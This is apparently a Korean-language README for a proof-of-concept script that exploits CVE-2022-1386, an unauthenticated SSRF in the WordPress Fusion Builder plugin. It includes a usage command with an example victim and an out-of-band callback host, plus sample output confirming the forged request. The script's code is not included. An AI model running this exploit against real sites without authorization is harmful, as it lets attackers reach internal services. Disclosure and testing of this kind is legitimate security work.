
WordPress Fusion Builder <3.6.2의 인증되지 않은 SSRF PoC (CVE-2022-1386)
버전 3.6.2 이전의 Fusion Builder 플러그인(Avada WordPress 테마에서 사용)에서 발생하는 인증되지 않은 SSRF(Server-Side Request Forgery, 서버 측 요청 위조) 취약점입니다.
공격자가 임의의 URL로 HTTP 요청을 보낼 수 있으며, 내부 서비스를 대상으로 삼을 수 있습니다.
admin-ajax.php로 전송되는 인증되지 않은 HTTP POSTpython3 exploit_cve_2022_1386.py <target_url> <your_callback_url>
예시:
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
콜백을 수신하려면 Interact.sh 또는 [Burp Collaborator]를 사용하세요.
📋 샘플 출력
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.
📌 참고 사항 이 PoC는 데이터 유출(exfiltration)을 수행하지 않습니다. 윤리적인 용도로만 사용하세요: 승인 없이 시스템을 악용하지 마십시오.
📚 참고 자료 https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/